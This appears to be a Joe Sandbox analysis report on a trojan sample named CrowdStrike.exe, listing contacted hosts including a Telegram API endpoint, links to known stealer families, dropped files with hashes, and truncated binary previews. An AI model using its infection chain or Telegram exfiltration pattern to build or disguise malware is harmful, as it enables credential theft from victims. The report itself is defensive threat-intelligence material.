          http://icanhazip.comRegAsm.exe, 0000000F.00000002.3703692097.0000000000702000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.3705258200.00000000026E1000.00000004.00000800.00020000.00000000.sdmpfalse
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://nsis.sf.net/NSIS_ErrorErrorCrowdStrike.exe, 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp, CrowdStrike.exe, 00000000.00000000.1686299423.0000000000408000.00000002.00000001.01000000.00000003.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://www.autoitscript.com/autoit3/CrowdStrike.exe, 00000000.00000003.1705313640.0000000002992000.00000004.00000020.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegAsm.exe, 0000000F.00000002.3705258200.00000000026E1000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          149.154.167.220
          		api.telegram.orgUnited Kingdom
          		62041TELEGRAMRUtrue
          104.16.185.241
          		icanhazip.comUnited States
          		13335CLOUDFLARENETUSfalse

          General Information

          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1477426
          Start date and time:2024-07-21 11:13:08 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 9m 54s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:17
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:CrowdStrike.exe
          Detection:MAL
          Classification:mal96.troj.evad.winEXE@24/40@4/2
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 35
          • Number of non-executed functions: 42
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Override analysis time to 240000 for current running targets taking high CPU consumption

          Warnings

          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtOpenFile calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtReadVirtualMemory calls found.
          • Report size getting too big, too many NtSetInformationFile calls found.

          Simulations

          Behavior and APIs

          TimeTypeDescription
          05:14:03API Interceptor1x Sleep call for process: CrowdStrike.exe modified
          05:14:06API Interceptor1x Sleep call for process: Champion.pif modified
          05:15:32API Interceptor1479116x Sleep call for process: RegAsm.exe modified

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          149.154.167.220ExFAhv0nes.exeGet hashmaliciousUnknownBrowse
            ExFAhv0nes.exeGet hashmaliciousUnknownBrowse
              cKt8r2v7Gy.exeGet hashmaliciousUnknownBrowse
                Final Shipping Documents.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                  VERY GOOD.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                    Order 8391-6.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                      order 4500029722.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        Enquiry-Dubai.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                          172131942401ffa05fff4c7d2b222e93d44117cc2a702a757a1aa7c5c6fc9cfeeacb380f89693.dat-decoded.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                            38dJrNR8hr.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                              104.16.185.241PR240614_ORDER.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                              • icanhazip.com/
                              172131942401ffa05fff4c7d2b222e93d44117cc2a702a757a1aa7c5c6fc9cfeeacb380f89693.dat-decoded.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                              • icanhazip.com/
                              38dJrNR8hr.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                              • icanhazip.com/
                              CV.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                              • icanhazip.com/
                              pp.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                              • icanhazip.com/
                              P.O.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                              • icanhazip.com/
                              ZfTfvfyShu.exeGet hashmaliciousUnknownBrowse
                              • icanhazip.com/
                              SecuriteInfo.com.Trojan.AutoIt.1410.29083.29061.exeGet hashmaliciousStealeriumBrowse
                              • icanhazip.com/
                              ptKNiAaGus.exeGet hashmaliciousUnknownBrowse
                              • icanhazip.com/
                              bJLd0SUHfj.exeGet hashmaliciousUnknownBrowse
                              • icanhazip.com/

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              api.telegram.orgExFAhv0nes.exeGet hashmaliciousUnknownBrowse
                              • 149.154.167.220
                              ExFAhv0nes.exeGet hashmaliciousUnknownBrowse
                              • 149.154.167.220
                              cKt8r2v7Gy.exeGet hashmaliciousUnknownBrowse
                              • 149.154.167.220
                              Final Shipping Documents.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 149.154.167.220
                              VERY GOOD.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 149.154.167.220
                              Order 8391-6.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                              • 149.154.167.220
                              order 4500029722.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 149.154.167.220
                              Enquiry-Dubai.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                              • 149.154.167.220
                              172131942401ffa05fff4c7d2b222e93d44117cc2a702a757a1aa7c5c6fc9cfeeacb380f89693.dat-decoded.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                              • 149.154.167.220
                              38dJrNR8hr.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                              • 149.154.167.220
                              icanhazip.comPR240614_ORDER.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                              • 104.16.185.241
                              Enquiry-Dubai.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                              • 104.16.184.241
                              172131942401ffa05fff4c7d2b222e93d44117cc2a702a757a1aa7c5c6fc9cfeeacb380f89693.dat-decoded.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                              • 104.16.185.241
                              38dJrNR8hr.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                              • 104.16.185.241
                              Enquiry.ps1Get hashmaliciousPXRECVOWEIWOEI StealerBrowse
                              • 104.16.184.241
                              CV.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                              • 104.16.184.241
                              CV.pdfGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                              • 104.16.184.241
                              CV.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                              • 104.16.185.241
                              pp.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                              • 104.16.185.241
                              P.O.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                              • 104.16.185.241

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              TELEGRAMRUExFAhv0nes.exeGet hashmaliciousUnknownBrowse
                              • 149.154.167.220
                              ExFAhv0nes.exeGet hashmaliciousUnknownBrowse
                              • 149.154.167.220
                              http://singaporepornvideossex.massagenow.my.id/Get hashmaliciousUnknownBrowse
                              • 149.154.167.99
                              file.exeGet hashmaliciousVidarBrowse
                              • 149.154.167.99
                              file.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                              • 149.154.167.99
                              9YDEsXvk5V.exeGet hashmaliciousVidarBrowse
                              • 149.154.167.99
                              https://telgramsignal1.sg-host.com/Get hashmaliciousUnknownBrowse
                              • 149.154.167.99
                              cKt8r2v7Gy.exeGet hashmaliciousUnknownBrowse
                              • 149.154.167.220
                              Final Shipping Documents.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 149.154.167.220
                              VERY GOOD.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 149.154.167.220
                              CLOUDFLARENETUSfile.exeGet hashmaliciousBabadedaBrowse
                              • 162.159.61.3
                              BE-0160-91904EI.exeGet hashmaliciousUnknownBrowse
                              • 104.21.77.190
                              CB-3433-3048OTZ.exeGet hashmaliciousUnknownBrowse
                              • 172.67.202.188
                              CFL-940-56382UY.exeGet hashmaliciousUnknownBrowse
                              • 172.67.182.157
                              EHF-1677-6833RPE.exeGet hashmaliciousUnknownBrowse
                              • 104.21.89.131
                              BON-1072-835CZB.exeGet hashmaliciousUnknownBrowse
                              • 104.21.77.189
                              file.exeGet hashmaliciousBabadedaBrowse
                              • 162.159.61.3
                              GAQ-527-3899XK.exeGet hashmaliciousUnknownBrowse
                              • 172.67.211.43
                              HIZ-88372-7497BCP.exeGet hashmaliciousUnknownBrowse
                              • 172.67.173.76
                              LRT-07219-94077CCQ.exeGet hashmaliciousUnknownBrowse
                              • 104.21.67.238

                              JA3 Fingerprints

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              3b5074b1b5d032e5620f69f9f700ff0edzCvoZ0uLj.exeGet hashmaliciousQuasarBrowse
                              • 149.154.167.220
                              0p8KrH1qfZ.exeGet hashmaliciousQuasarBrowse
                              • 149.154.167.220
                              SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exeGet hashmaliciousUnknownBrowse
                              • 149.154.167.220
                              SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exeGet hashmaliciousUnknownBrowse
                              • 149.154.167.220
                              Mx0UGSI897.exeGet hashmaliciousDCRatBrowse
                              • 149.154.167.220
                              https://xv-dna-idx-com.resmi-v1.biz.id/Get hashmaliciousUnknownBrowse
                              • 149.154.167.220
                              https://help-metaprotectextension.gitbook.io/Get hashmaliciousUnknownBrowse
                              • 149.154.167.220
                              https://bet3659981.com/Get hashmaliciousUnknownBrowse
                              • 149.154.167.220
                              http://madive-bunde-thinkkjhgf.pages.dev/help/contact/728719822901550/Get hashmaliciousHTMLPhisherBrowse
                              • 149.154.167.220
                              http://www.829347219502.com/Get hashmaliciousUnknownBrowse
                              • 149.154.167.220

                              Dropped Files

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              C:\Users\user\AppData\Local\Temp\564784\Champion.pif9YDEsXvk5V.exeGet hashmaliciousVidarBrowse
                                S9iJqTQS7q.exeGet hashmaliciousRedLineBrowse
                                  bRlvBJEl6T.exeGet hashmaliciousVidarBrowse
                                    WINWORD.exeGet hashmaliciousNetWireBrowse
                                      7sYKxZWLgw.exeGet hashmaliciousPureLog StealerBrowse
                                        7sYKxZWLgw.exeGet hashmaliciousUnknownBrowse
                                          55wj9QSq9c.exeGet hashmaliciousRedLineBrowse
                                            0dN59ZIkEM.exeGet hashmaliciousVidarBrowse
                                              file.exeGet hashmaliciousSmokeLoaderBrowse
                                                Celery.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                                                  C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSecuriteInfo.com.Trojan.Siggen29.2381.17841.24795.exeGet hashmaliciousRedLineBrowse
                                                    oRALyHjeXB.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                                                      oRALyHjeXB.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                                                        UnDqKnghuz.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                                                          SecuriteInfo.com.Trojan.Inject5.5521.21793.4561.exeGet hashmaliciousXenoRATBrowse
                                                            PURCHASE_ORDER.exeGet hashmaliciousXWormBrowse
                                                              GaBpQuL0ie.exeGet hashmaliciousAsyncRATBrowse
                                                                rRERFQ__________________.exeGet hashmaliciousXWormBrowse
                                                                  Bank Details.exeGet hashmaliciousNanocoreBrowse
                                                                    27062024_1338_ItsComedy.exeGet hashmaliciousAsyncRATBrowse

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1031
                                                                      Entropy (8bit):5.352154694194798
                                                                      Encrypted:false
                                                                      SSDEEP:24:MLUE4Kx1qE4qpE4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MIHKx1qH2HKlYHKh3oPtHo6hAHKzeR
                                                                      MD5:9478992210AE74141FC3B9E7FCA5D80E
                                                                      SHA1:E7C0DF2C80FCE2322D5A7E3D7416965AE7355762
                                                                      SHA-256:E33633B8FBACDD8BE18B170500B6FF75F835233643EBC9FC2EAFCB5F3DBA335A
                                                                      SHA-512:F0149B6C0B7F47D740C902648642C229BD9B01D41BCDC66A4CA27124372A4789CFC0A7F2B5642BC203F8CAB9BDB277B6A1799E92A80471ECEDBB78E9921C808C
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                      C:\Users\user\AppData\Local\Temp\564784\Champion.pif

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:modified
                                                                      Size (bytes):893608
                                                                      Entropy (8bit):6.620254876639106
                                                                      Encrypted:false
                                                                      SSDEEP:12288:DpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31troPTdFqgaAV2M0L:DT3E53Myyzl0hMf1te7xaA8M0L
                                                                      MD5:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                                      SHA1:F2F57024C7CC3F9FF5F999EE20C4F5C38BFC20A2
                                                                      SHA-256:865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
                                                                      SHA-512:57D56DE2BB882F491E633972003D7C6562EF2758C3731B913FF4D15379ADA575062F4DE2A48CA6D6D9241852A5B8A007F52792753FD8D8FEE85B9A218714EFD0
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 7%
                                                                      • Antivirus: Virustotal, Detection: 3%, Browse
                                                                      Joe Sandbox View:
                                                                      • Filename: 9YDEsXvk5V.exe, Detection: malicious, Browse
                                                                      • Filename: S9iJqTQS7q.exe, Detection: malicious, Browse
                                                                      • Filename: bRlvBJEl6T.exe, Detection: malicious, Browse
                                                                      • Filename: WINWORD.exe, Detection: malicious, Browse
                                                                      • Filename: 7sYKxZWLgw.exe, Detection: malicious, Browse
                                                                      • Filename: 7sYKxZWLgw.exe, Detection: malicious, Browse
                                                                      • Filename: 55wj9QSq9c.exe, Detection: malicious, Browse
                                                                      • Filename: 0dN59ZIkEM.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: Celery.exe, Detection: malicious, Browse
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\564784\L

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):723951
                                                                      Entropy (8bit):7.999741137427432
                                                                      Encrypted:true
                                                                      SSDEEP:12288:G8aNy0WKYPp3DGqRm51F7QqkyCMQd58T94Ql9kO6yYdYg9+wymXfSw4hycjNc4AL:FaNhgDIL919kOaYgtyAqw4scjKu8
                                                                      MD5:FCA0910949D92DC3DD3DFCF0FB3D0408
                                                                      SHA1:9FC9B505FC882C1DFECBFC5DA33A9E083871BE95
                                                                      SHA-256:6F3428555B02970C6F0E0CD40E5D7296BD5CD6326A8CC197CA1AA9025091318B
                                                                      SHA-512:DC3E055390C4780318E8B7D98E48F8D74A8027399DB996F50805E088230B760E705188D1C301790B8E13EB70DE503C2B626ADB1C27FB746CE703BA15DB324DBC
                                                                      Malicious:false
                                                                      Preview:...b..G..@.`...i..nA.w...\....&....01.c.,..i.3.0^P.!.D.......,.G.....c=...a..8X.p...g..8F.l7..s..}hE...........w.....I+..!pa...jI....Tm...x......@f.....q...;8(.~..'%}@[...B?<.....*.k....9(~?..f...b...k..5...<....[..l.\!..s.B.`. xD*.>....?.@B..$S).[...@Z."e`D...L......[...Y..)..6..]|..Q.!..M..x~a.$....X...G....f.M./8....!..Pco..)(.....jX<.cn.tu..l......:e..:..M/.Y..-Mz..RM03$l9....T u.g..d..(.?...Oe....^S..2.....f#.9r8..a..)7.*...k.N._.".]g;......z....j.|4o)......F.../xPiiLh....(...zZ.+Q.DD_......&Ji.6...HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....G.=.'.F...h.............v....oo.v....oo.kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..|.T..,P..Myn.2..t.W....V.....

                                                                      C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\564784\Champion.pif
                                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):65440
                                                                      Entropy (8bit):6.049806962480652
                                                                      Encrypted:false
                                                                      SSDEEP:768:X8XcJiMjm2ieHlPyCsSuJbn8dBhFwlSMF6Iq8KSYDKbQ22qWqO8w1R:rYMaNylPYSAb8dBnsHsPDKbQBqTY
                                                                      MD5:0D5DF43AF2916F47D00C1573797C1A13
                                                                      SHA1:230AB5559E806574D26B4C20847C368ED55483B0
                                                                      SHA-256:C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
                                                                      SHA-512:F96CF9E1890746B12DAF839A6D0F16F062B72C1B8A40439F96583F242980F10F867720232A6FA0F7D4D7AC0A7A6143981A5A130D6417EA98B181447134C7CFE2
                                                                      Malicious:false
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                                      Joe Sandbox View:
                                                                      • Filename: SecuriteInfo.com.Trojan.Siggen29.2381.17841.24795.exe, Detection: malicious, Browse
                                                                      • Filename: oRALyHjeXB.exe, Detection: malicious, Browse
                                                                      • Filename: oRALyHjeXB.exe, Detection: malicious, Browse
                                                                      • Filename: UnDqKnghuz.exe, Detection: malicious, Browse
                                                                      • Filename: SecuriteInfo.com.Trojan.Inject5.5521.21793.4561.exe, Detection: malicious, Browse
                                                                      • Filename: PURCHASE_ORDER.exe, Detection: malicious, Browse
                                                                      • Filename: GaBpQuL0ie.exe, Detection: malicious, Browse
                                                                      • Filename: rRERFQ__________________.exe, Detection: malicious, Browse
                                                                      • Filename: Bank Details.exe, Detection: malicious, Browse
                                                                      • Filename: 27062024_1338_ItsComedy.exe, Detection: malicious, Browse
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0.............^.... ........@.. ....................... .......F....`.....................................O.......8................A........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......

                                                                      C:\Users\user\AppData\Local\Temp\Acrobat

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):51200
                                                                      Entropy (8bit):6.5020993529746125
                                                                      Encrypted:false
                                                                      SSDEEP:1536:3q5YdzhtD4RLGki26nWRgRPaM60w9/5SO:3qi/x4Rqf21Rgat0g/L
                                                                      MD5:B676C3573D166783AD23AEEC025D9788
                                                                      SHA1:D872CADEC97AD2BC5883793C8504C7EFFDA0E25C
                                                                      SHA-256:B09C0E4E65B615B4A957AB44E59ECCA0CA2A789AE22C8AF13C1B6846B0697E5E
                                                                      SHA-512:B3B0FAAD23213A9361F6DD90EA700D4C1372C07E1A8A5BF2D25CCBD21FD80745CED906BFBFCE2FCDADABFF76E65CCECBFD17501B27D28729DEAAC0F496E69989
                                                                      Malicious:false
                                                                      Preview:..k!....V...a!..;.v.V...U!....9r.v..B..H..s/...U.....3.;........z..v..B..H..Q/....3..E....tK...tF.M........Vj.j.S.0!........!/..P.M..(...F;.r.M..E.P......M...........+.E.@P......3..].Y;.s4.E.+.].]..E.Vj.j.S.. ............M..1F;.r..]..E..}........u......8......=...M...V..-..S....V....YY....j.j..H....pO.._^3.[..]...U.....e......E..E..E.SVW.@....E.....3.0...7+...F..E..E..@..p....!+...F..u..E.F.HH......HthHtSHt?H.......F..H...-...E....&.u....j+..!.3.@j..F.P...H.....N.......F..H..-..H.E.x.F..H..-...E..t..F..H..-.....x....~.3..u..E..u..u....p..u.S.0.:........].u.;^..u...u...*..3.@.&..F.....*..3.@.F..C..._^3.[..]...U..E.SVW.@..0....*...F..u...8.*...&.3.C.^....f..t"P.....Y..t.......f..u...f*...^..._^3.[]...U..E.SVW.@..0...)...F..u...8.4*...&.3.C.^....f..t"P....I...t.......f..u....*...^..._^3.[]...U..E.SVW.@..0...Z)...F..u...8..)...&.3.C.^....f..t"P....I...t.......f..u...)...^..._^3.[]...U..E.SVW.@..0....(...F..u...8.t)...&.3.C.^....f..t"P.....Y..t.......f..u

                                                                      C:\Users\user\AppData\Local\Temp\Ah

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):60416
                                                                      Entropy (8bit):6.60583328733246
                                                                      Encrypted:false
                                                                      SSDEEP:1536:9Q6JP04vDcmrIEVJRa5oQyyk4qt1FqnLUshVkf88nfNk4qqdGYynh:9Q4NvoWV7a5ouYNqnLzAfaBaGj
                                                                      MD5:390569AF71570B823EED8C4D63733AF8
                                                                      SHA1:1D6F23F8ABB11203661F6CA59A6D3EEC975EAB32
                                                                      SHA-256:023A48297F82FDB98E70645FCA8703C1E0CC04835B166652CB155EC4850506B5
                                                                      SHA-512:80A7BA548DD1378E975D32CB5D6B6B54C3E47B8A292CD8FBEDAB1886A53360E8865423CC78664E8860D792D58A5C5758966C364DE1C03517D526A5FB0C14D5BC
                                                                      Malicious:false
                                                                      Preview:...j..M.......F...l.~........j..M.......F........~........j[.M.......F...5.~........j[.M......F.......~........j\.M......F...E..P..........~........j\.M..a....F...u.~ .t.j.S...b....n.~..u.j..M..9....E..P.u...3..W.M.....f9.t'W.M......M...0...P......E..P....G..8^.u.j..M.......E..P.]....M.......M......_^[..].......F...F...F...F.M.F.j.F...F...F...F...F.3.F.f.F.-.F...F...F.U....VW.}....~GS.M..`....u..b...3...E.f.E..E.P......^...S......E..P.....Ou.S.......[_^..]...U..Q.E.SW...W.M.....I.f....8].t@V.5..I.Qj.j.W..M.P.u.. ....M..?...Qj.j.W..M.P.u.......M......^_..[..]...U... ...SVW.}...~ ........G..]..}.....................................t~......P....I...t.................P....I................<.u........~..u..~..u....u..~..u..~..u...... ...RPh......R...Ph......j.Ph.....v ....I..P...t!...a...Q..<.u.j...j..u..u.......*f.E.3.j..E..E.....B3.!M.!M.PR.U.f.M.....I........_^[..]...U... ...SVW.}...~ ........G..]..}.................................................P....I...t....

                                                                      C:\Users\user\AppData\Local\Temp\Architects

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):15360
                                                                      Entropy (8bit):6.592759647081098
                                                                      Encrypted:false
                                                                      SSDEEP:384:Xk/3fNJH03ApHUYk1dx59ib+Pk8cdPptJ:XEp0wpk1dxvhc8cdPpn
                                                                      MD5:A46346EB86D98CCB81A8743DC0C6C111
                                                                      SHA1:45FCA7577D328D0431E5D3B608019FEF24EE8303
                                                                      SHA-256:3C63D2E589E41C927D02F9BB0E983F1C2AD8BDDF417C1DA6DD9B5B3979EA1E97
                                                                      SHA-512:D093FCF0552AE6F2A04660A9EEBD4A3536307A545412AE796E1067F8A3D466BC8B738F9ACFFDB8DFA3730980BF62E2DAAD1C06AB9A6F789F19BE3AF0017D0C46
                                                                      Malicious:false
                                                                      Preview:.E.P.I..E...........M.............pe...O..e...E..E.P.I..E..........M..........O.u..E....P........'....A....O....E.A..E.A..E..A..M.E......E.A..E.A..E.A..E......t..M....x......t..M..k...3..E..I..E.].P.]..].]..]..E.......|.I.j.X.]..].f.E.}...W.P..E..].P.M.]..E..........M.......M.E.P.E..L..._...Q.E.....L..PQS.E...P.E.P.E.P.....u.Q.E.PQj..E...P.E.P.E.P.....S.u..H....'....E....L.P..\.I..M..]..].....M......M..z~..3._^[..]...U.......SV..M.W.]..s....T....s....d....s..j.3..}.Y3..u..}....1....M...D...V.G......7....Y..y.VVVP...:....]..U..M.j.XS.u.f.E...D...P.#................VVVj.j.VVj.V..p.I.j..E.VP......M..U........9u........u..M..E.......x..hL,I..M..........u..E.E..E..u..u......}.;}.v..E..E...t....r...u..E.VP..t.....t....t...P..T.....}....t.....}....T....M.E...X....E..G.j.P..t...P.Y...P..d.....|....t.....|....d....E...h....E...t.S.]..3...Y.E....u..u..E..E.....j..E.E.[.]..u.u..E......u.E...j..u.[j..E.u.VP.....E.....E..E..E..;I..u.Pj..E.Pj.V..D...P..|.I.

                                                                      C:\Users\user\AppData\Local\Temp\Buyers

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):43008
                                                                      Entropy (8bit):3.2720068663221333
                                                                      Encrypted:false
                                                                      SSDEEP:384:aMOUyM0pNDj21naB3pMygarucTQ0yrJcLH03LfTN319stEjFKr+/hdv:JyM0Dj2Bmgari07LULTN3Efr8
                                                                      MD5:A001542705E46D08B5B2D97CD0706599
                                                                      SHA1:0D21AC40BA775FF7E99F2162B3FDC68A21989C54
                                                                      SHA-256:EE55F2498F769CBAF5E60C7E3E28A93BEEE507083920CF9D18C9CA9043409E56
                                                                      SHA-512:6E0056246B26EB04305C6D6805D6DDBA5F1422B01C6686E798E9752166A66402B088338AB7F243933A04AF4ADADC82040E9B5E0C374FCA214B25B725D46B4924
                                                                      Malicious:false
